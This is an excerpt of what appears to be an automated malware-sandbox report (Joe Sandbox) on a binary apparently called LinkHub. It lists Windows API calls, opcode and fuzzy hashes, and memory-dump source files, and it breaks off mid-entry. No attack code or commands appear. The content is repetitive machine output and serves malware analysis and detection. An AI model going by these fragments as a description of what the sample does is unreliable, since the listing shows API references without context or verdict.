                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: 5db2404720a74e06843ffc78b9fcf6297697036566e8741e867b9860f2fd82de
                                                                                        • Instruction ID: 5ecf192b15744272e6755f92a387146be63f891cc0c50c3bd2694b422794fabb
                                                                                        • Opcode Fuzzy Hash: 5db2404720a74e06843ffc78b9fcf6297697036566e8741e867b9860f2fd82de
                                                                                        • Instruction Fuzzy Hash: 17F06235A10228BBDB119F94FC4DBADBFB4EF04752F004069F809A21A0DF749E60DA94
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32 ref: 0025E785
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0025E797
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0025E7BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                        • API String ID: 145871493-2590602151
                                                                                        • Opcode ID: 0d8bce3d14645909e0ddc235b567be898f7eafa8ab248ff46d0e710c4bfe4cd5
                                                                                        • Instruction ID: 36beb32d9e2970f0f2e842c3f7af70f42017a1f219a326ef8a4203d506a5f8bb
                                                                                        • Opcode Fuzzy Hash: 0d8bce3d14645909e0ddc235b567be898f7eafa8ab248ff46d0e710c4bfe4cd5
                                                                                        • Instruction Fuzzy Hash: 0DF0E5B28316219FDF795F309C4CEA972686F20742B22059AFC05E3110DB70CEA88A58
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020664A
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0020665C
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020666E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 145871493-3689287502
                                                                                        • Opcode ID: c8a207d9a78248a982a59a6fe59a54ba977f03377e4e545475ee5eb47b784406
                                                                                        • Instruction ID: fee68220d9a88f1d7a477c62cecb26049e6c21dadec3e46908d2b306b62765a3
                                                                                        • Opcode Fuzzy Hash: c8a207d9a78248a982a59a6fe59a54ba977f03377e4e545475ee5eb47b784406
                                                                                        • Instruction Fuzzy Hash: F8E0863661162317D3112B25BC0CB5A656C9F92B12B050216F808E2150DF64CC2190A4
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206610
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00206622
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206635
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 145871493-1355242751
                                                                                        • Opcode ID: 413eec86a44cef3249b9c402866df7c071d36531408d1c6f7d5c798922724ee6
                                                                                        • Instruction ID: 38c877418d01b86b1345add15f52da529d50f33c3a2fc81c7d2c318b5c0f2d32
                                                                                        • Opcode Fuzzy Hash: 413eec86a44cef3249b9c402866df7c071d36531408d1c6f7d5c798922724ee6
                                                                                        • Instruction Fuzzy Hash: 09D0123662263257C7222B25BC1CA8F6A189E92B513490116B818A2154CF65CD3195A8
APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002735C4
• DeleteFileW.KERNEL32(?), ref: 00273646
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0027365C
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0027366D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0027367F
Memory Dump Source
• Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
APIs
• GetCurrentProcessId.KERNEL32 ref: 0028AE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0028AE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0028AEC8
• CloseHandle.KERNEL32(?), ref: 0028B09D
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
  • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
  • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
  • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
  • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028C560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0028C5C3
• RegCloseKey.ADVAPI32(?,?), ref: 0028C606
• RegCloseKey.ADVAPI32(00000000), ref: 0028C613
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
  • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0026D7CD,?), ref: 0026E714
  • Part of subcall function 0026E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0026D7CD,?), ref: 0026E72D
  • Part of subcall function 0026EAB0: GetFileAttributesW.KERNEL32(?,0026D840), ref: 0026EAB1
• lstrcmpiW.KERNEL32(?,?), ref: 0026ED8A
• MoveFileW.KERNEL32(?,?), ref: 0026EDC3
• _wcslen.LIBCMT ref: 0026EF02
• _wcslen.LIBCMT ref: 0026EF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0026EF67
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
• VariantInit.OLEAUT32(?), ref: 00269534
• VariantClear.OLEAUT32 ref: 002695A5
• VariantClear.OLEAUT32 ref: 00269604
• VariantClear.OLEAUT32(?), ref: 00269677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002696A2
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002795F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0027961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00279677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0027969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002796A4
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 0028999D
• GetProcAddress.KERNEL32(00000000,?), ref: 00289A2D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00289A49
• GetProcAddress.KERNEL32(00000000,?), ref: 00289A8F
• FreeLibrary.KERNEL32(00000000), ref: 00289AAF
  • Part of subcall function 0021F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00271A02,?,753CE610), ref: 0021F9F1
  • Part of subcall function 0021F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00260354,00000000,00000000,?,?,00271A02,?,753CE610,?,00260354), ref: 0021FA18
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
• String ID:
• API String ID: 666041331-0
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 0029766B
• SetWindowLongW.USER32(?,000000EC,?), ref: 00297682
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002976AB
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0027B5BE,00000000,00000000), ref: 002976D0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 002976FF
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
                                                                                        • Opcode ID: 19a8d8b9e5576514b950a2b00a95b761dda91605a25155d05e098c66875187ce
                                                                                        • Instruction ID: 5fcc82cd290b9dbffd73c14570c1266039c610d39306d327a825d459ac37672f
                                                                                        • Opcode Fuzzy Hash: 19a8d8b9e5576514b950a2b00a95b761dda91605a25155d05e098c66875187ce
                                                                                        • Instruction Fuzzy Hash: 5841CFB2A20210EFDB20DF78C881A59B3F6EF88314F1545A9E615EB391D631ED15CB80
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00262262
                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 0026230E
                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00262316
                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00262327
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0026232F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3382505437-0
                                                                                        • Opcode ID: 4923ff4c47f7041dbaf99b9a03cf18f3cca2ae4f5f4d72a13939c76d33956b61
                                                                                        • Instruction ID: 36ce9916cf009a9e38352593a75f7451e05f0ef3f19cfe4e3f9af2d59b433b58
                                                                                        • Opcode Fuzzy Hash: 4923ff4c47f7041dbaf99b9a03cf18f3cca2ae4f5f4d72a13939c76d33956b61
                                                                                        • Instruction Fuzzy Hash: 0D31C272910219EFDB14CFA8DD8DADE3BB5EB04315F104225FD25AB2D0C77099A4DB90
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0027CC63,00000000), ref: 0027D97D
                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 0027D9B4
                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,0027CC63,00000000), ref: 0027D9F9
                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0027CC63,00000000), ref: 0027DA0D
                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0027CC63,00000000), ref: 0027DA37
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 3191363074-0
                                                                                        • Opcode ID: b9c9a7a436010f5c6a50ee9c0f4b5f6b6bd7997220b4150163cdd0e30c03a0ab
                                                                                        • Instruction ID: b078da45cb34922feadc6a00c9e3be15483380683af3e13b723bf143ced92f2f
                                                                                        • Opcode Fuzzy Hash: b9c9a7a436010f5c6a50ee9c0f4b5f6b6bd7997220b4150163cdd0e30c03a0ab
                                                                                        • Instruction Fuzzy Hash: A7315C71924206EFDB20DFA5E988AAFBBF8EF44350B10846EE54AD2151D770EE50DB60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002961E4
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0029623C
                                                                                        • _wcslen.LIBCMT ref: 0029624E
                                                                                        • _wcslen.LIBCMT ref: 00296259
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 002962B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 763830540-0
                                                                                        • Opcode ID: 38915e03d85d7617b2dd173d563aca7ebcf593993c6c4d70eae96c349e071f53
                                                                                        • Instruction ID: c900dbb0227cfb8926a30cf11ddded12d255013ce3b18e70fe86ab688c9ed87a
                                                                                        • Opcode Fuzzy Hash: 38915e03d85d7617b2dd173d563aca7ebcf593993c6c4d70eae96c349e071f53
                                                                                        • Instruction Fuzzy Hash: B4219131D20219AADF119FA4DC88AEEB7B9EF05760F104217F929EA180D7B099A5DF50
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 002813AE
                                                                                        • GetForegroundWindow.USER32 ref: 002813C5
                                                                                        • GetDC.USER32(00000000), ref: 00281401
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 0028140D
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00281445
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 69f48fdb88eabebcc9db0c07292b460217acf5fed3a9e4e76ca70c60740d91bf
                                                                                        • Instruction ID: 341856acb2956a5719933cbaccfeb1d95aa0e64f72b623b5d9009163eef09ee5
                                                                                        • Opcode Fuzzy Hash: 69f48fdb88eabebcc9db0c07292b460217acf5fed3a9e4e76ca70c60740d91bf
                                                                                        • Instruction Fuzzy Hash: 00219336610204AFDB04EF65D888AAEB7F9EF48340B048469F84AD7791CA30AD54DF90
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0023D146
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0023D169
                                                                                          • Part of subcall function 00233B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0023D18F
                                                                                        • _free.LIBCMT ref: 0023D1A2
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0023D1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 336800556-0
                                                                                        • Opcode ID: 24c9b2ecddfaa11a034f4a87f231d5dbad481a4d16ca170dfa3d102c26ad1b76
                                                                                        • Instruction ID: ec3719bece846e7e65b10dda8a800eaee75a114cb4b93d8622d3c4d03e22ac91
                                                                                        • Opcode Fuzzy Hash: 24c9b2ecddfaa11a034f4a87f231d5dbad481a4d16ca170dfa3d102c26ad1b76
                                                                                        • Instruction Fuzzy Hash: DD01A7F76216167F33216A7A7C8CD7B7A7EEEC2B61714012AFD4CC6244DA608D1195B0
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(74DE2E40,?,?,0022F64E,00233BD6,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233170
                                                                                        • _free.LIBCMT ref: 002331A5
                                                                                        • _free.LIBCMT ref: 002331CC
                                                                                        • SetLastError.KERNEL32(00000000), ref: 002331D9
                                                                                        • SetLastError.KERNEL32(00000000), ref: 002331E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: ea94c501098ad923b0dc3bd5ea4e08bf3f2b9dc585e8eeb7a31b6d5213627f66
                                                                                        • Instruction ID: 66b07a4883ef7ed8842ca823218bab0ae4957c50f6f720376e76ccbc73a33d24
                                                                                        • Opcode Fuzzy Hash: ea94c501098ad923b0dc3bd5ea4e08bf3f2b9dc585e8eeb7a31b6d5213627f66
                                                                                        • Instruction Fuzzy Hash: C70178F22706017B8312EB34BC89E2B26ADAFC1772F200026F85CD2181EFA1CF315920
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?,?,00260C4E), ref: 0026091B
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260936
                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260944
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?), ref: 00260954
                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00260831,80070057,?,?), ref: 00260960
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: bd85a5e9f3c360a91872994b0f2db2814aad47cffb991077fd6ed6c6b2fabb6c
                                                                                        • Instruction ID: b4bda0986ff618ebee3373d276e23248a9188c47b486a751a15764294a3e5f11
                                                                                        • Opcode Fuzzy Hash: bd85a5e9f3c360a91872994b0f2db2814aad47cffb991077fd6ed6c6b2fabb6c
                                                                                        • Instruction Fuzzy Hash: 9E01F772621205BFEB014F54DC88B9F7BBEEF44B51F100115F905D2112D7B0DD91AB60
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0026F2AE
                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0026F2BC
                                                                                        • Sleep.KERNEL32(00000000), ref: 0026F2C4
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0026F2CE
                                                                                        • Sleep.KERNEL32 ref: 0026F30A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: 68370e4dd0c24f8d151688a39237f36d709291023b8d13f380f092b8bc65656e
                                                                                        • Instruction ID: 4c7236ffc56db42f437dda1ee54ac3965f8d333753c167e2f824f5e4afd3d580
                                                                                        • Opcode Fuzzy Hash: 68370e4dd0c24f8d151688a39237f36d709291023b8d13f380f092b8bc65656e
                                                                                        • Instruction Fuzzy Hash: AF016971D11619DBDF00AFA4FE4DAEEBB78FB08700F0004A6E901B2254DB7095B4DBA1
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00261A60
                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A6C
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A7B
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002614E7,?,?,?), ref: 00261A82
                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00261A99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
